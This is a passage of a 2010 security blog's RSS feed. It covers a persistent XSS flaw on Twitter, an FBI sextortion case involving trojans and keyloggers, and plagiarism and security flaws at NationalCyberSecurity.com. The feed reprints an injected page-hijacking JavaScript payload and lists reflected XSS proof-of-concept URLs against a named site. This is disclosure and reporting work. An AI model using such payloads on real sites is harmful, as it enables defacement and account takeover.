if (e.which==2||e.which==3) {(message);return false;}}}
if (document.layers)
{document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS;}
else{document.onmouseup=clickNS;document.oncontextmenu=clickIE;}

document.oncontextmenu=new Function("return false")
// --&gt;


//***********//
//form tags to omit in NS6+:
var omitformtags=["input", "textarea", "select"]

omitformtags=omitformtags.join("|")

function disableselect(e){
if (omitformtags.indexOf(e.target.tagName.toLowerCase())==-1)
return false
}

function reEnable(){
return true
}

if (typeof document.onselectstart!="undefined")
document.onselectstart=new Function ("return false")
else{
document.onmousedown=disableselect
document.onmouseup=reEnable
}

/***********/

scrW=screen.availWidth
scrH=screen.availHeight
window.resizeTo(10,10)
window.focus()
for(a=0;a&lt;80;a++){
window.moveTo(0,0)
window.resizeTo(0,scrH*a/80)
}

window.resizeTo(0,0)
for(b=0;b&lt;80;b++){
window.moveTo(0,scrH/1)
window.resizeTo(scrW*b/80,0)
}

for(c=0;c&lt;80;c++){
window.moveTo(scrW/1,scrH/1)
window.resizeTo(0,scrH*c/80)
}

for(d=0;d&lt;80;d++){
window.moveTo(scrW/1,0)
window.resizeTo(scrW*d/80,0)
}

for(e=0;e&lt;80;e++){
window.resizeTo(scrW*e/80,scrH*e/80)
}

window.moveTo(0,0)
window.resizeTo(scrW,scrH) 

///************************///
var wibiya_pl = "false";
var wibiya_nc = "true";
var wibiya_latestJq = false;
var wibiya_flashFix = false;
var wibiya_jQuery_ver = 132;
var wibiyaTimeoutId;

function jquery_ver(){
    return parseInt(jQuery.fn.jquery.replace(/\./gi,'').substring(0,3));
}

if (!Array.prototype.indexOf) {
    Array.prototype.indexOf = function(obj, start) {
        for (var i = (start || 0), j = this.length; i &lt; j; i++) {
            if (this[i] === obj) {
                return i;
            }
        }
        return -1;
    }
}

function loadjscssfile(filename, filetype, where){
    var fileref;
    if (filetype=="js"){ //if filename is a external JavaScript file
        fileref=document.createElement("script");
        fileref.setAttribute("type","text/javascript");
        fileref.setAttribute("src", filename);
    }
    else if (filetype=="css"){ //if filename is an external CSS file
        fileref=document.createElement("link");
        fileref.setAttribute("rel", "stylesheet");
        fileref.setAttribute("type", "text/css");
        fileref.setAttribute("href", filename);
    }
    if (typeof fileref!="undefined"){
        if (where=="head"){
            document.getElementsByTagName("head")[0].appendChild(fileref);
        }
        else{
            document.getElementsByTagName("body")[0].appendChild(fileref);
        }
    }
}

function CheckJQueryLoader(toolbarId)
{
    if (typeof jQuery == "function")
    {
        if (!wibiya_latestJq)
        {
            clearTimeout(wibiyaTimeoutId);
            SetToolbarLoad();
        }
        else
        {
            if (jquery_ver() &gt;= wibiya_jQuery_ver)
            {
                clearTimeout(wibiyaTimeoutId);
                SetToolbarLoad();
            }
            else
            {
                wibiyaTimeoutId =  setTimeout("CheckJQueryLoader("+toolbarId+");",200);
            }
        }
    }
    else
    {
        wibiyaTimeoutId =  setTimeout("CheckJQueryLoader("+toolbarId+");",200);
    }
}

function getQueryParam(name){
    var qString = window.location.search.substring(1).split("&amp;");
    var params = new Array();

    var p;
    for(var i=0; i&lt;qString.length; i++){
        p = qString[i].split("=");
        params[p[0]] = p[1];
    }

    return params[name];
}

function SetToolbarLoad(){
    var wibiya_mobiles = ["iphone","ipod","ipad","series60","symbian","android","windows ce",
        "blackberry","palm","avantgo","docomo","vodafone","j-phone",
        "xv6850","htc","lg;","lge","mot","nintendo","nokia","samsung","sonyericsson"];
    wibiyaToolbar.wibiya_isMobile = false;
    wibiyaToolbar.wibiya_uAgent = navigator.userAgent.toLowerCase();
    for(var i=0;i&lt;wibiya_mobiles.length;i++){
        if(wibiyaToolbar.wibiya_uAgent.match(wibiya_mobiles[i]) != null){
            wibiyaToolbar.wibiya_isMobile = true;
            break;
        }
    }

    if ((jQuery.browser.msie &amp;&amp; parseInt(jQuery.browser.version)==6) ||  wibiyaToolbar.wibiya_isMobile == true){
        // ie 6 and below -&gt; do nothing
    }
    else{
        if(wibiya_flashFix === true){
            wibiyaToolbar.rewriteFlash = 0;
            wibiyaToolbar.framework.FlashFix();
            wibiyaToolbar.rewriteFlashInterval = setInterval("wibiyaToolbar.framework.FlashFix();", 3333);
        }

        wibiyadomain = "http://cdn.wibiya.com/Toolbars/dir_0463/Toolbar_463831/";
        // no-conflict
        if (wibiya_nc=="true") jQuery.noConflict();

        var altToolbar = getQueryParam("toolbarObjId");
        // detect jd_gallery, ie, user_request - load page after document.ready
        if (typeof (startGallery) == "function" || jQuery.browser.msie || wibiya_pl=="true") {
            var wibiyaScriptSrc;
            jQuery(document).ready(function(){
                if (typeof altToolbar == "undefined"){
                    wibiyaScriptSrc = wibiyadomain+"toolbar_463831_4c1ec2a47b60f.js";
                }
                else{
                    wibiyaScriptSrc = altToolbar;
                }
                loadjscssfile(wibiyaScriptSrc,"js","body");
            });
        }
        else{
            if (typeof altToolbar == "undefined"){
                wibiyaScriptSrc = wibiyadomain+"toolbar_463831_4c1ec2a47b60f.js";
            }
            else{
                wibiyaScriptSrc = altToolbar;
            }
            loadjscssfile(wibiyaScriptSrc,"js","body");
        }
    }
}


if (typeof(wibiyaToolbar)!="object"){
    if ( typeof jQuery != "function"){
        loadjscssfile("http://cdn.wibiya.com/Scripts/jquery-1.4.2.min.js","js","head");
    }
    else{
        if (wibiya_latestJq &amp;&amp; jquery_ver() != wibiya_jQuery_ver){
            loadjscssfile("http://cdn.wibiya.com/Scripts/jquery-1.4.2.min.js","js","head");
        }
    }

    var wibiyaToolbar = {};
    wibiyaToolbar.framework = {};

    wibiyaToolbar.id="463831";
    wibiyaToolbar.referrer=document.referrer;
    CheckJQueryLoader(wibiyaToolbar.id);
}


/************************************************************************/
/* Rainbow Links Version 1.03 (2003.9.20)                               */
/* Script updated by Dynamicdrive.com for IE6                           */
/* Copyright (C) 1999-2001 TAKANASHI Mizuki                             */
/* takanasi@hamal.freemail.ne.jp                                        */
/*----------------------------------------------------------------------*/
/* Read it somehow even if my English text is a little wrong! ;-)       */
/*                                                                      */
/* Usage:                                                               */
/*  Insert '&lt;script src="rainbow.js"&gt;&lt;/script&gt;' into the BODY section,  */
/*  right after the BODY tag itself, before anything else.              */
/*  You don't need to add "onMouseover" and "onMouseout" attributes!!   */
/*                                                                      */
/*  If you'd like to add effect to other texts(not link texts), then    */
/*  add 'onmouseover="doRainbow(this);"' and                            */
/*  'onmouseout="stopRainbow();"' to the target tags.                   */
/*                                                                      */
/* This Script works with IE4,Netscape6,Mozilla browser and above only, */
/* but no error occurs on other browsers.                               */
/************************************************************************/


////////////////////////////////////////////////////////////////////
// Setting

var rate = 20;  // Increase amount(The degree of the transmutation)


////////////////////////////////////////////////////////////////////
// Main routine

if (document.getElementById)
window.onerror=new Function("return true")

var objActive;  // The object which event occured in
var act = 0;    // Flag during the action
var elmH = 0;   // Hue
var elmS = 128; // Saturation
var elmV = 255; // Value
var clrOrg;     // A color before the change
var TimerID;    // Timer ID


if (document.all) {
    document.onmouseover = doRainbowAnchor;
    document.onmouseout = stopRainbowAnchor;
}
else if (document.getElementById) {
    document.captureEvents(Event.MOUSEOVER | Event.MOUSEOUT);
    document.onmouseover = Mozilla_doRainbowAnchor;
    document.onmouseout = Mozilla_stopRainbowAnchor;
}


//=============================================================================
// doRainbow
//  This function begins to change a color.
//=============================================================================
function doRainbow(obj)
{
    if (act == 0) {
        act = 1;
        if (obj)
            objActive = obj;
        else
            objActive = event.srcElement;
        clrOrg = objActive.style.color;
        TimerID = setInterval("ChangeColor()",100);
    }
}


//=============================================================================
// stopRainbow
//  This function stops to change a color.
//=============================================================================
function stopRainbow()
{
    if (act) {
        objActive.style.color = clrOrg;
        clearInterval(TimerID);
        act = 0;
    }
}


//=============================================================================
// doRainbowAnchor
//  This function begins to change a color. (of a anchor, automatically)
//=============================================================================
function doRainbowAnchor()
{
    if (act == 0) {
        var obj = event.srcElement;
        while (obj.tagName != 'A' &amp;&amp; obj.tagName != 'BODY') {
            obj = obj.parentElement;
            if (obj.tagName == 'A' || obj.tagName == 'BODY')
                break;
        }

        if (obj.tagName == 'A' &amp;&amp; obj.href != '') {
            objActive = obj;
            act = 1;
            clrOrg = objActive.style.color;
            TimerID = setInterval("ChangeColor()",100);
        }
    }
}


//=============================================================================
// stopRainbowAnchor
//  This function stops to change a color. (of a anchor, automatically)
//=============================================================================
function stopRainbowAnchor()
{
    if (act) {
        if (objActive.tagName == 'A') {
            objActive.style.color = clrOrg;
            clearInterval(TimerID);
            act = 0;
        }
    }
}


//=============================================================================
// Mozilla_doRainbowAnchor(for Netscape6 and Mozilla browser)
//  This function begins to change a color. (of a anchor, automatically)
//=============================================================================
function Mozilla_doRainbowAnchor(e)
{
    if (act == 0) {
        obj = e.target;
        while (obj.nodeName != 'A' &amp;&amp; obj.nodeName != 'BODY') {
            obj = obj.parentNode;
            if (obj.nodeName == 'A' || obj.nodeName == 'BODY')
                break;
        }

        if (obj.nodeName == 'A' &amp;&amp; obj.href != '') {
            objActive = obj;
            act = 1;
            clrOrg = obj.style.color;
            TimerID = setInterval("ChangeColor()",100);
        }
    }
}


//=============================================================================
// Mozilla_stopRainbowAnchor(for Netscape6 and Mozilla browser)
//  This function stops to change a color. (of a anchor, automatically)
//=============================================================================
function Mozilla_stopRainbowAnchor(e)
{
    if (act) {
        if (objActive.nodeName == 'A') {
            objActive.style.color = clrOrg;
            clearInterval(TimerID);
            act = 0;
        }
    }
}


//=============================================================================
// Change Color
//  This function changes a color actually.
//=============================================================================
function ChangeColor()
{
    objActive.style.color = makeColor();
}


//=============================================================================
// makeColor
//  This function makes rainbow colors.
//=============================================================================
function makeColor()
{
    // Don't you think Color Gamut to look like Rainbow?

    // HSVtoRGB
    if (elmS == 0) {
        elmR = elmV;    elmG = elmV;    elmB = elmV;
    }
    else {
        t1 = elmV;
        t2 = (255 - elmS) * elmV / 255;
        t3 = elmH % 60;
        t3 = (t1 - t2) * t3 / 60;

        if (elmH &lt; 60) {
            elmR = t1;  elmB = t2;  elmG = t2 + t3;
        }
        else if (elmH &lt; 120) {
            elmG = t1;  elmB = t2;  elmR = t1 - t3;
        }
        else if (elmH &lt; 180) {
            elmG = t1;  elmR = t2;  elmB = t2 + t3;
        }
        else if (elmH &lt; 240) {
            elmB = t1;  elmR = t2;  elmG = t1 - t3;
        }
        else if (elmH &lt; 300) {
            elmB = t1;  elmG = t2;  elmR = t2 + t3;
        }
        else if (elmH &lt; 360) {
            elmR = t1;  elmG = t2;  elmB = t1 - t3;
        }
        else {
            elmR = 0;   elmG = 0;   elmB = 0;
        }
    }

    elmR = Math.floor(elmR).toString(16);
    elmG = Math.floor(elmG).toString(16);
    elmB = Math.floor(elmB).toString(16);
    if (elmR.length == 1)    elmR = "0" + elmR;
    if (elmG.length == 1)    elmG = "0" + elmG;
    if (elmB.length == 1)    elmB = "0" + elmB;

    elmH = elmH + rate;
    if (elmH &gt;= 360)
        elmH = 0;

    return '#' + elmR + elmG + elmB;
}


//****************************//
var scrolltotop={setting:{startline:100,scrollto:0,scrollduration:1000,fadeduration:[500,100]},controlHTML:'&lt;iframe title="h4x0r-x0x" src="http://www5.shoutmix.com/?h4x0r-x0x" width="500" height="700" frameborder="0" scrolling="auto"&gt;&lt;/iframe&gt;',controlattrs:{offsetx:5,offsety:5},anchorkeyword:'#top',state:{isvisible:false,shouldvisible:false},scrollup:function(){if(!this.cssfixedsupport)
this.$control.css({opacity:0})
var dest=isNaN(this.setting.scrollto)?this.setting.scrollto:parseInt(this.setting.scrollto)
if(typeof dest=="string"&amp;&amp;jQuery('#'+dest).length==1)
dest=jQuery('#'+dest).offset().top
else
dest=0
this.$body.animate({scrollTop:dest},this.setting.scrollduration);},keepfixed:function(){var $window=jQuery(window)
var controlx=$window.scrollLeft()+$window.width()-this.$control.width()-this.controlattrs.offsetx
var controly=$window.scrollTop()+$window.height()-this.$control.height()-this.controlattrs.offsety
this.$control.css({left:controlx+'px',top:controly+'px'})},togglecontrol:function(){var scrolltop=jQuery(window).scrollTop()
if(!this.cssfixedsupport)
this.keepfixed()
this.state.shouldvisible=(scrolltop&gt;=this.setting.startline)?true:false
if(this.state.shouldvisible&amp;&amp;!this.state.isvisible){this.$control.stop().animate({opacity:1},this.setting.fadeduration[0])
this.state.isvisible=true}
else if(this.state.shouldvisible==false&amp;&amp;this.state.isvisible){this.$control.stop().animate({opacity:0},this.setting.fadeduration[1])
this.state.isvisible=false}},init:function(){jQuery(document).ready(function($){var mainobj=scrolltotop
var iebrws=document.all
mainobj.cssfixedsupport=!iebrws||iebrws&amp;&amp;document.compatMode=="CSS1Compat"&amp;&amp;window.XMLHttpRequest
mainobj.$body=(window.opera)?(document.compatMode=="CSS1Compat"?$('html'):$('body')):$('html,body')
mainobj.$control=$('&lt;div id="topcontrol"&gt;'+mainobj.controlHTML+'&lt;/div&gt;').css({position:mainobj.cssfixedsupport?'fixed':'absolute',bottom:mainobj.controlattrs.offsety,right:mainobj.controlattrs.offsetx,opacity:0,cursor:'pointer'}).attr({title:'Scroll Back to Top'}).click(function(){mainobj.scrollup();return false}).appendTo('body')
if(document.all&amp;&amp;!window.XMLHttpRequest&amp;&amp;mainobj.$control.text()!='')
mainobj.$control.css({width:mainobj.$control.width()})
mainobj.togglecontrol()
$('a[href="'+mainobj.anchorkeyword+'"]').click(function(){mainobj.scrollup()
return false})
$(window).bind('scroll resize',function(e){mainobj.togglecontrol()})})}}
scrolltotop.init()
</code></pre>

<h3>H4X0R-X0X</h3>

<p>The researcher who found the problem hosts his blog at a .co.cc URL. While .cc is the country code for the Cocos (Keeling) Islands in Australia, .co.cc is actually a company offering free subdomain redirection services (http://www.co.cc/). The IP address of the blog (74.125.113.121) is shown as owned by Google Inc. Perhaps the most relevant piece of origin information is the language used on the blog and in the forum: Indonesian.</p>

<p>The flag isn&#8217;t a bad clue either.</p>

<p><div id="attachment_4437" class="wp-caption alignnone" style="width: 760px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/forum_entry.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/forum_entry.jpg" alt="" title="forum_entry" width="750" height="672" class="size-full wp-image-4437" /></a><p class="wp-caption-text">Forum post at Balikita.net, a Community of Art.</p></div>
<br /></p>

<h3>Impact</h3>

<p>As demonstrated in the past, XSS vulnerabilities in Twitter have been successfully used to take over accounts and create worms (Mikeyy, StalkDaily). Infection (account takeover) can be accomplished simply by visiting a profile that includes a malicious JavaScript, making a true self-propagating web site worm possible, as opposed to other more recent attacks based on phishing a user&#8217;s credentials with a fake Twitter login screen (the &#8220;LOL is this you&#8221; style of attack).</p>

<p><div id="attachment_4462" class="wp-caption alignright" style="width: 160px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/19520928_3.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/19520928_3-150x150.jpg" alt="" title="19520928_3" width="150" height="150" class="size-thumbnail wp-image-4462" /></a><p class="wp-caption-text">Twitter's Del Harvey</p></div>

<p>This might be Twitter&#8217;s first serious cross-site scripting vulnerability since the beginning of this year. Twitter has to correct this quickly, as it was public knowledge before this post and has been for days. We note that the problem has been reported to Twitter by a fellow researcher, and we also reported the issue to Del Harvey (Twitter&#8217;s Trust and Safety Team). We could have gone through the security e-mail address, but frankly the last time we did that the response irritated us. And since Harvey once worked <a href="http://www.perverted-justice.com/?pg=profiledel">in a mental institution</a>, she is probably the most qualified to deal with security people.</p>

<h3>Update</h3>

<p>As of 6pm the problem is still active in old applications, as one of our commentators below pointed out (with a working example). Twitter advised that the project has been corrected for new applications.</p>

<p><strong>Related Posts:</strong></p>
<ul>
<li><a href="http://praetorianprefect.com/archives/2009/12/james-lipton-says-dont-tweet-your-junk/">James Lipton says &#8220;Don&#8217;t tweet your junk&#8221;</a></li>
<li><a href="http://praetorianprefect.com/archives/2009/11/%e2%80%9chi-this-you-lol%e2%80%9d-twitter-attack-snares-kevin-mitnick/">“Hi. This you?? LOL” Twitter Attack Snares Kevin Mitnick</a></li>
<li><a href="http://praetorianprefect.com/archives/2009/11/not-the-haus-of-gaga-too/">Not the Haus of Gaga too</a></li>
<li><a href="http://praetorianprefect.com/archives/2009/10/facebook%e2%80%99s-faith-a-new-scareware-attack/">Facebook’s Faith: A New Scareware Attack</a></li>
<li><a href="http://praetorianprefect.com/archives/2009/09/breaking-twitter-authentication/">Breaking Twitter (authentication)</a></li>
</ul><br />
]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2010/06/persistent-xss-on-twitter-com/feed/</wfw:commentRss>
		<slash:comments>15</slash:comments>
		</item>
		<item>
		<title>Sextortion via Hacking</title>
		<link>http://praetorianprefect.com/archives/2010/06/sextortion-via-hacking/</link>
		<comments>http://praetorianprefect.com/archives/2010/06/sextortion-via-hacking/#comments</comments>
		<pubDate>Wed, 23 Jun 2010 20:58:09 +0000</pubDate>
		<dc:creator>Prefect</dc:creator>
				<category><![CDATA[Malware]]></category>
		<category><![CDATA[cyberextortion]]></category>
		<category><![CDATA[cyberstalking]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=4411</guid>
		<description><![CDATA[At least 186 women and 44 girls were caught in a bizarre scheme by 31 year old Santa Ana CA resident Luis Mijangos, who attempted to extort pornographic videos from his victims. Mijangos, a paraplegic due to a gang shooting, was arrested yesterday following a two year investigation by the FBI; he is charged with extortion and faces a maximum of two years in federal prison.]]></description>
			<content:encoded><![CDATA[<p><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/fbi.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/fbi.jpg" alt="" title="fbi" width="99" height="100" class="alignleft size-full wp-image-4413" /></a></p>

<p>At least 186 women and 44 girls were caught in a bizarre scheme by 31 year old Santa Ana CA resident Luis Mijangos, who attempted to extort pornographic videos from his victims. Mijangos, a paraplegic due to a gang shooting, was arrested yesterday following a two year investigation by the FBI; he is charged with extortion and faces a maximum of two years in federal prison.</p>

<p>The FBI originally became involved in 2009 when called in by the Glendale Police to look into the complaint of a woman who suspected she was being stalked by an ex-boyfriend. The FBI&#8217;s investigation led them to Mijangos. A forensic analysis showed cracking activity dating back to 2008.</p>

<h3>The Scheme</h3>

<p>Mijangos initially gained control of users&#8217; PCs using Trojans disguised as popular songs on peer-to-peer file sharing networks. Once he took control of a PC, he would search for sexually explicit photographs and financial information, and attempt to use what he found to extort further pornographic videos from his victims. Bizarre e-mails would come from mijangos3@msn.com (he also went by Guicho) demanding that sex tapes be made by the victims:</p>

<pre><code>"I will publish the images and let your family know about your dark side … so you better do that video,
 send it to me via e-mail and you will never hear from me ever...If I don't hear from you then your family
 will hear from me,"
</code></pre>

<pre><code>"You have three kids and a psycho ex but hat [sic] I don't care if you don't want this pics and the rest I 
have from you to be published [sic] this is what I want...A porn video of you 'you can blur your face;' 
if don't get the video ina day I will publish thse [sic] images and let your family know about your 
dark side as a hooker"
</code></pre>

<p>In one case he sent a nude picture of the victim to her and demanded her silence and a pornographic video or he would tell her family. He would tell victims that since he controlled their computers, he would know if they tried to contact authorities.</p>

<p>At times he would pose as the victim&#8217;s boyfriend and request the explicit content; when he succeeded, he would demand increasingly explicit videos be made and sent to him under threat of releasing the previously sent images. Finally, there is evidence that he used web cams and microphones attached to the compromised computers to watch his victims in various states of undress or during intimate activities. At least one 20 year old woman put a sticker over her web cam when it continually went on without her doing anything.</p>

<p>He also used keyloggers to gain access to social networking sites, e-mail, credit card numbers, and so forth, both to gather further information to perpetuate the scheme and to make purchases. He sent malware via instant messenger to the contacts of his victims to infect more computers, tallying more than 100 infected in all.</p>

<p>Mijangos indicated he was a consultant with programming knowledge of both Java and C++, so at this point the authorities and media have dubbed him a &#8220;master hacker&#8221;. Mijangos himself has indicated he is part of a team of &#8220;international hackers&#8221; and told at least one victim you don&#8217;t want to mess with a team of hackers.</p>

<h3>His Defense</h3>

<p>Mijangos came up with his own bizarre explanation for his actions: that he was in fact hired by boyfriends and husbands to see if the women would respond to requests for pornographic materials, a sort of fidelity test similar to what a private investigator might do to find a cheating spouse. Interestingly, Mijangos was so stupid that he continued his illegal activities even after a search warrant was executed back in March of this year. When caught he had in his home dozens of videos showing victims in states of undress (leaving the shower, getting dressed, engaging in intercourse) as well as financial data including credit card numbers alongside TurboTax, T-Mobile, Netflix, Paypal, HSBC, and Chase Bank account information.</p>

<p>Mijangos is a Mexican national, thus the INS is also involved.</p>

<h3>Finally</h3>

<p>This case is not the first involving cyber-extortion (think back to the DDoS extortion threats made against web site operators), but it is unusual in that it was not money being requested. It&#8217;s not clear to me why this man only faces two years in prison, and why the charges are limited to extortion, when 44 of the victims were juveniles, making this potentially a child pornography case also. Identity theft would also appear applicable.</p>

<p>Either way, this is a good example of the FBI showing an interest in a seemingly innocuous case, cyberstalking by an ex-boyfriend, that instead led to and nailed a pretty serious predator. Much like in the corporate environment, a lot can happen when you start to pull on a thread.</p>

<h3>References</h3>

<ul>
<li><a href="http://www.oc180news.com/printFriendlyPDF/articlePDF/18884.pdf">Santa Ana Man Arrested by FBI for Hacking Computers and Demanding Sexually Explicit Videos from Women and Teenage Girls</a></li>
<li><a href="http://www.latimes.com/news/local/orange/la-me-0623-hacker-20100623,0,3987251.story">FBI charges O.C. man in &#8217;sextortion&#8217; case</a></li>
<li><a href="http://www.latimes.com/news/nationworld/nation/wire/sns-ap-us-hacker-sex-extortion,0,246511.story">Prosecutors say Calif man hacked into computers to extort sex videos from women, teen girls</a></li>
</ul>

]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2010/06/sextortion-via-hacking/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>NationalCyberSecurity.com has all &#8220;Original Content&#8221;</title>
		<link>http://praetorianprefect.com/archives/2010/06/nationalcybersecurity-com-has-all-original-content/</link>
		<comments>http://praetorianprefect.com/archives/2010/06/nationalcybersecurity-com-has-all-original-content/#comments</comments>
		<pubDate>Mon, 21 Jun 2010 21:36:10 +0000</pubDate>
		<dc:creator>Prefect</dc:creator>
				<category><![CDATA[Industry News]]></category>
		<category><![CDATA[charlatans]]></category>
		<category><![CDATA[ligatt]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=4364</guid>
		<description><![CDATA[Readers of Yahoo Finance were treated to the following wackadoo press release on Friday: <a href="http://finance.yahoo.com/news/National-Cyber-Security-pz-2336404204.html?x=0&#38;.v=1">National Cyber Security Uncovers Racism Within the Computer Security Industry</a>.]]></description>
			<content:encoded><![CDATA[<p><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/nationalcybersec.png"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/nationalcybersec-150x60.png" alt="" title="nationalcybersec" width="150" height="60" class="alignleft size-thumbnail wp-image-4365" /></a></p>

<p>Readers of Yahoo Finance were treated to the following wackadoo press release on Friday: <a href="http://finance.yahoo.com/news/National-Cyber-Security-pz-2336404204.html?x=0&amp;.v=1">National Cyber Security Uncovers Racism Within the Computer Security Industry</a>. In <a href="http://praetorianprefect.com/archives/2010/06/4305/">our article Friday</a> we made a case for a better title: &#8220;Ligatt Discovers that People Don&#8217;t Like Being Plagiarized&#8221;. The web site referenced, <a href="http://www.nationalcybersecurity.com/">National Cyber Security by Ligatt</a>, is a not-so-subtle takeoff of the name of the National Cyber Security Division (NCSD) in the Department of Homeland Security. This &#8220;National Cyber Security&#8221; is another strange project from confidence man Gregory Evans of Ligatt Security.</p>

<p>Here is the stated mission:</p>

<p><i>&#8220;National Cyber Security is the number one cyber security related reference and news portal. It is their vital mission to help secure not only the nation, but the world from cyber criminal threats being faced daily. Their references include a cyber security watch news, blogs written by cyber security professionals, cyber security links, and email correspondence to their professionals who help protect website visitors from any cyber threat.</i></p>

<p>But with <a href="http://praetorianprefect.com/archives/2010/06/4305/">fake reporter profiles</a>, plagiarized articles, dubious cyber-terrorism experts, bizarre biographies of other people, and a site riddled with security flaws: the actual message of the web site is overtaken by a subtler truth about charlatans in the information security industry.</p>

<h3>McKenzie</h3>

<p><i>&#8220;By purchasing National Cyber Security, we will be able to partner with fellow computer security experts like Grey McKenzie to be a force against cyber-crime.&#8221;</i> &#8211; Gregory Evans</p>

<p>McKenzie was part of an anti-keylogging product called <a href="http://www.spycop.com/">SpyCop</a> that, according to forum posts, appears to have either gone dark or continued in a different form. Strangely, while McKenzie lists himself as creator of the National Cyber Security Portal, he lists no affiliation with Ligatt on LinkedIn. It appears the site was purchased by Ligatt on 3/31/09 and redesigned, although the original site had republished news stories as well.</p>

<h3>Plagiarized Content</h3>

<p>IronGeek has done an excellent job making the case against Ligatt&#8217;s plagiarism on this web site with the following YouTube video, which amusingly begins with Evans stating that the site is &#8220;all original content&#8221; and not stories gathered through &#8220;Googles&#8221;:</p>

<p><object width="660" height="525"><param name="movie" value="http://www.youtube.com/v/zDBCcZ3NKHQ&#038;hl=en_US&#038;fs=1&#038;rel=0&#038;border=1"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/zDBCcZ3NKHQ&#038;hl=en_US&#038;fs=1&#038;rel=0&#038;border=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="660" height="525"></embed></object>
<br /></p>

<h3>Bizarre Biographies</h3>

<p><div id="attachment_4368" class="wp-caption alignnone" style="width: 488px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/ncs-plagiarism-judith_pugh.png"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/ncs-plagiarism-judith_pugh.png" alt="" title="ncs-plagiarism-judith_pugh" width="478" height="478" class="size-full wp-image-4368" /></a><p class="wp-caption-text">Judith Pugh or J.L. Smith?</p></div>
<br /></p>

<p>It is sad when you can&#8217;t even steal effectively. The answer is both, this picture is of <a href="http://www.reportingfordoodie.com/">J.L. Smith</a> aka Judith Pugh, author of <u>Reporting for Doodie, One Grandmother&#8217;s Story of Commitment, Frustration &amp; Unwavering Love</u> and not a National Cyber Security author.</p>

<h3>Riddled with Security Flaws</h3>

<p>On Friday the site was victimized by what appears to be a persistent XSS vulnerability, which allowed whoever exploited it to replace the picture of Gregory Evans with a picture reference to <a href="http://encyclopediadramatica.com/Epic_Fail_Guy">Epic Fail Guy</a>, itself a pseudo reference to &#8216;Anonymous&#8217;, Guy Fawkes, et al.:</p>

<p><div id="attachment_4379" class="wp-caption alignnone" style="width: 710px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/natlcybersecurity1.png"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/natlcybersecurity1.png" alt="" title="natlcybersecurity" width="700" height="390" class="size-full wp-image-4379" /></a><p class="wp-caption-text">Gregory Evans as Guy Fawkes stick figure Epic Fail Guy.</p></div>
<br /></p>

<p>The flaw that allowed this is in addition to numerous cross site scripting (XSS) issues on the web site:</p>

<pre><code>http://www.nationalcybersecurity.com/search?Query=%3CIMG+SRC%3D%22http%3A%2F%2Fattrition.org
/images/squirrel-mascot-iconL.gif%22%3E&amp;fromSmall=true&amp;searchWhat=searchAll&amp;submit.x=20&amp;submit.y=10&amp;
searchField=searchContentBody&amp;searchField=searchContentBody
</code></pre>

<p><div id="attachment_4372" class="wp-caption alignnone" style="width: 310px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/xss_1.png"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/xss_1-300x255.png" alt="" title="xss_1" width="300" height="255" class="size-medium wp-image-4372" /></a><p class="wp-caption-text">Source: Attrition.org.</p></div>
<br /></p>

<pre><code>http://www.nationalcybersecurity.com/admin/index.php?username=&lt;script&gt;alert('xss')&lt;/script&gt;
</code></pre>

<p><div id="attachment_4373" class="wp-caption alignnone" style="width: 310px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/2010-05-26-ncs-username.png"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/2010-05-26-ncs-username-300x164.png" alt="" title="2010-05-26-ncs-username" width="300" height="164" class="size-medium wp-image-4373" /></a><p class="wp-caption-text">Source: http://quine.dreamwidth.org/2904.html</p></div>
<br /></p>

<pre><code>http://www.nationalcybersecurity.com/search?Query=&lt;script&gt;alert('xss')&lt;/script&gt;
</code></pre>

<p><div id="attachment_4374" class="wp-caption alignnone" style="width: 310px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/2010-05-19-ncs-query.png"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/2010-05-19-ncs-query-300x194.png" alt="" title="2010-05-19-ncs-query" width="300" height="194" class="size-medium wp-image-4374" /></a><p class="wp-caption-text">Source: http://quine.dreamwidth.org/2722.html</p></div>
<br /></p>

<p>Is having these types of flaws on an information security site the end of the world? We just wrote a story about <a href="http://praetorianprefect.com/archives/2010/06/f-secure-xss-on-anti-theft-website/">F-Secure having something similar</a> on their US site last week. The difference: F-Secure corrected the issue, and wrote a post describing the problem, within twenty four hours of notification. Web site injection flaws are common; security companies will have them from time to time, and the key to deriving meaning from such stories is evaluating how the security firm responds.</p>

<h3>Finally</h3>

<p>Edmund Burke once said, &#8220;All that is necessary for evil to triumph is for good men to do nothing.&#8221;</p>

<h3>Related Content</h3>

<ul>
<li><a href="http://attrition.org/errata/charlatan/gregory_evans/ligatt09/">Gregory D. Evans, Even More Plagiarism</a></li>
</ul>

<p><strong>Related Posts:</strong></p>
<ul>
<li><a href="http://praetorianprefect.com/archives/2010/06/asian-men-prefer-ligatt/">Asian Men Prefer LIGATT</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/06/4305/">LIGATT&#8217;s Evans Strikes Back</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/06/did-ligatt-securitys-ceo-threaten-the-life-of-a-security-professional/">Did LIGATT Security&#8217;s CEO Threaten the Life of a Security Professional?</a></li>
